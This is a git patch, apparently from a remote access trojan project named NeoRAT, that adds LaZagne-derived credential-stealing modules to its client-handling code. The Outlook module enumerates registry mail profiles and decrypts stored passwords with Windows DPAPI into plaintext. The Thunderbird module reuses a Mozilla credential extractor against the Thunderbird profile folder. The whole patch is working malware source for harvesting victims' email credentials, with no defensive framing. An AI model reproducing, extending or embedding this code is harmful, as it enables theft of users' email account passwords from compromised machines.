From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/mails/__init__.py            |  0
 .../lazagne/softwares/mails/outlook.py             | 66 ++++++++++++++++++++++
 .../lazagne/softwares/mails/thunderbird.py         |  9 +++
 3 files changed, 75 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/mails/__init__.py
 create mode 100644 foreign/client_handling/lazagne/softwares/mails/outlook.py
 create mode 100644 foreign/client_handling/lazagne/softwares/mails/thunderbird.py

(limited to 'foreign/client_handling/lazagne/softwares/mails')

diff --git a/foreign/client_handling/lazagne/softwares/mails/__init__.py b/foreign/client_handling/lazagne/softwares/mails/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/foreign/client_handling/lazagne/softwares/mails/outlook.py b/foreign/client_handling/lazagne/softwares/mails/outlook.py
new file mode 100644
index 0000000..21cf6b8
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/mails/outlook.py
@@ -0,0 +1,66 @@
+# -*- coding: utf-8 -*- 
+try: 
+    import _winreg as winreg
+except ImportError:
+    import winreg
+
+import foreign.client_handling.lazagne.config.winstructure as win
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+
+
+class Outlook(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'outlook', 'mails', registry_used=True, winapi_used=True)
+
+    def run(self):
+        key_path = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
+        try:
+            hkey = win.OpenKey(win.HKEY_CURRENT_USER, key_path)
+        except Exception as e:
+            self.debug(e)
+            return
+
+        num = winreg.QueryInfoKey(hkey)[0]
+        pwd_found = []
+        for x in range(0, num):
+            name = winreg.EnumKey(hkey, x)
+            skey = win.OpenKey(hkey, name, 0, win.ACCESS_READ)
+
+            num_skey = winreg.QueryInfoKey(skey)[0]
+            if num_skey != 0:
+                for y in range(0, num_skey):
+                    name_skey = winreg.EnumKey(skey, y)
+                    sskey = win.OpenKey(skey, name_skey)
+                    num_sskey = winreg.QueryInfoKey(sskey)[1]
+
+                    for z in range(0, num_sskey):
+                        k = winreg.EnumValue(sskey, z)
+                        if 'password' in k[0].lower():
+                            values = self.retrieve_info(sskey, name_skey)
+
+                            if values:
+                                pwd_found.append(values)
+
+            winreg.CloseKey(skey)
+        winreg.CloseKey(hkey)
+        return pwd_found
+
+    def retrieve_info(self, hkey, name_key):
+        values = {}
+        num = winreg.QueryInfoKey(hkey)[1]
+        for x in range(0, num):
+            k = winreg.EnumValue(hkey, x)
+            if 'password' in k[0].lower():
+                try:
+                    password = win.Win32CryptUnprotectData(k[1][1:], is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
+                    values[k[0]] = password.decode('utf16')
+                except Exception as e:
+                    self.debug(str(e))
+                    values[k[0]] = 'N/A'
+            else:
+                try:
+                    values[k[0]] = str(k[1]).decode('utf16')
+                except Exception:
+                    values[k[0]] = str(k[1])
+        return values
diff --git a/foreign/client_handling/lazagne/softwares/mails/thunderbird.py b/foreign/client_handling/lazagne/softwares/mails/thunderbird.py
new file mode 100644
index 0000000..a76ae9e
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/mails/thunderbird.py
@@ -0,0 +1,9 @@
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.softwares.browsers.mozilla import Mozilla
+
+
+class Thunderbird(Mozilla):
+
+    def __init__(self):
+        self.path = u'{APPDATA}\\Thunderbird'
+        ModuleInfo.__init__(self, 'Thunderbird', 'mails')
-- 
cgit v1.2.3